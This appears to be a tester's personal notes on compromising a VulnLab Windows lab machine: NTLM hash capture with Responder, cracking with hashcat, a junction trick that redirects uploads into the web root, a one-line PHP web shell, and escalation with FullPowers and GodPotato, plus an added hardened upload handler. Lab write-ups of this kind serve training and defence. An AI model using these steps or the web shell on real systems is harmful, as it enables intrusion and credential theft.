Media

This is not a writeup, just my notes about VulnLabs machines.

Machine information

Operating System: Microsoft Windows Server 2022 Standard

Chain: False (standalone compromise)

Credentials

Username   Password     Method       Scope
ENOX       1234virus@   NTLM Steal

✅ Valid Usernames

ENOX

🔑 Passwords list

1234virus@

Information Gathering

# Nmap 7.94SVN scan initiated Tue Apr  8 22:04:48 2025 as: nmap -sS -p- -A --open -T5 -Pn -n -oN ext_media_tcp_allports -vvv 10.10.117.146
22/tcp   open  tcpwrapped syn-ack ttl 127
80/tcp   open  tcpwrapped syn-ack ttl 127
3389/tcp open  tcpwrapped syn-ack ttl 127

Service Enumeration

HTTP

  • CMS: Umbraco

  • Programming Language: PHP

Possible Usernames:

  • Parveen Anand

  • Diana Petersen

  • Larry Parker

Foothold

The application included a file-upload feature whose submissions were then opened by a person; that review step made it possible to steal the reviewer's NTLM hash.

❯ sudo responder -I tun0
[sudo] password for Intrusionz3r0: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.117.146
[SMB] NTLMv2-SSP Username : MEDIA\enox
[SMB] NTLMv2-SSP Hash     : enox::MEDIA:dcdd1c94677eaf7d<SNIP>
❯ hashcat -m 5600 enox.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

<SNIP>

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

ENOX::MEDIA:dcdd1c94677eaf7d:38211fce4<SNIP>000000:1234virus@

Lateral movement as local service user

During enumeration the tester found a PHP file that creates a folder under C:/Windows/Tasks/Uploads/ whose name is the MD5 hash of firstname, lastname and email, and stores all uploaded files in it.

<?php
error_reporting(0);

// Your PHP code for handling form submission and file upload goes here.
$uploadDir = 'C:/Windows/Tasks/Uploads/'; // Base upload directory

if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["fileToUpload"])) {
    $firstname = filter_var($_POST["firstname"], FILTER_SANITIZE_STRING);
    $lastname = filter_var($_POST["lastname"], FILTER_SANITIZE_STRING);
    $email = filter_var($_POST["email"], FILTER_SANITIZE_STRING);

    // Create a folder name using the MD5 hash of Firstname + Lastname + Email
    $folderName = md5($firstname . $lastname . $email);

    // Create the full upload directory path
    $targetDir = $uploadDir . $folderName . '/';

    // Ensure the directory exists; create it if not
    if (!file_exists($targetDir)) {
        mkdir($targetDir, 0777, true);
    }

    // Sanitize the filename to remove unsafe characters
    $originalFilename = $_FILES["fileToUpload"]["name"];
    $sanitizedFilename = preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename);

    // Build the full path to the target file
    $targetFile = $targetDir . $sanitizedFilename;

    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) {
        echo "<script>alert('Your application was successfully submitted. Our HR shall review your video and get back to you.');</script>";

        // Update the todo.txt file
        $todoFile = $uploadDir . 'todo.txt';
        $todoContent = "Filename: " . $originalFilename . ", Random Variable: " . $folderName . "\n";

        // Append the new line to the file
        file_put_contents($todoFile, $todoContent, FILE_APPEND);
    } else {
        echo "<script>alert('Uh oh, something went wrong... Please submit again');</script>";
    }
}
?>

The target directory name is predictable (it is derived only from the submitted form fields), so it can be pre-created as a junction on Windows that redirects every uploaded file (for example a PHP web shell) into C:\xampp\htdocs, giving a reverse shell on the system.

Obtaining the directory name and creating the PHP web shell.

echo -n  "testtesttest@test.com" | md5sum
echo '<?php system($_GET["cmd"]);?>' > shell.php
enox@MEDIA C:\Users>mklink /J "C:/Windows/Tasks/Uploads/44b85c98e94039c8a0a015f6d3a3449e/" "C:\xampp\htdocs" 
Junction created for C:/Windows/Tasks/Uploads/44b85c98e94039c8a0a015f6d3a3449e/ <<===>> C:\xampp\htdocs

Uploading the malicious PHP web shell.

Accessing the PHP web shell as local service.
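For reference, a hardened rewrite of the upload handler above. This is an added example, not the target's code: it keeps the same form fields and base directory, but derives the per-submission directory from a CSPRNG instead of the submitted fields, refuses a directory that already exists or that does not resolve under the base path, and picks the on-disk filename itself. The allowed video extensions are an assumption.

```php
<?php
// Hardened upload handler (added example, not the target's code). Same form
// fields and base directory as the original; the extension list is assumed.
declare(strict_types=1);
error_reporting(E_ALL);
$uploadDir  = 'C:/Windows/Tasks/Uploads/';
$allowedExt = ['mp4', 'webm', 'mov']; // assumption: HR reviews video files

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['fileToUpload'])) {
    $file = $_FILES['fileToUpload'];
    if ($file['error'] !== UPLOAD_ERR_OK) {
        http_response_code(400);
        exit('Upload rejected');
    }
    // Directory name from a CSPRNG, not from attacker-controlled form fields:
    // it cannot be computed in advance and pre-created as a junction.
    $targetDir = $uploadDir . bin2hex(random_bytes(16)) . '/';

    // Non-recursive mkdir with a restrictive mode; fail closed if the path
    // already exists, since it must have been planted by someone else.
    if (!@mkdir($targetDir, 0700, false)) {
        http_response_code(500);
        exit('Could not create upload directory');
    }

    // Defence in depth: the directory must resolve to a real subdirectory of
    // the base path, so a junction or symlink pointing elsewhere is refused.
    $realBase = realpath($uploadDir);
    $realDir  = realpath($targetDir);
    if ($realBase === false || $realDir === false
        || strncmp($realDir, $realBase . DIRECTORY_SEPARATOR, strlen($realBase) + 1) !== 0) {
        http_response_code(500);
        exit('Upload directory check failed');
    }

    // Server-chosen filename: only a whitelisted extension survives.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        http_response_code(400);
        exit('File type not allowed');
    }
    $targetFile = $targetDir . bin2hex(random_bytes(8)) . '.' . $ext;

    if (!move_uploaded_file($file['tmp_name'], $targetFile)) {
        http_response_code(500);
        exit('Upload failed');
    }
    // Record the submitted name for HR, never the on-disk folder name.
    file_put_contents($uploadDir . 'todo.txt', "Filename: " . basename($file['name']) . "\n", FILE_APPEND | LOCK_EX);
}
```

The mkdir failure already stops the pre-created-junction case; the realpath comparison additionally catches a reparse point introduced after creation.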

Privilege Escalation to NT Authority System

Using FullPowers.exe to recover the default privilege set of the service account token.

PS C:\Users> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State   
============================= =================================== ========
SeTcbPrivilege                Act as part of the operating system Disabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled 
SeCreateGlobalPrivilege       Create global objects               Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set      Disabled
SeTimeZonePrivilege           Change the time zone                Disabled
PS C:\Users> 

Tool: FullPowers.exe

Abusing SeImpersonatePrivilege to compromise the computer.

Binary: GodPotato-NET4.exe
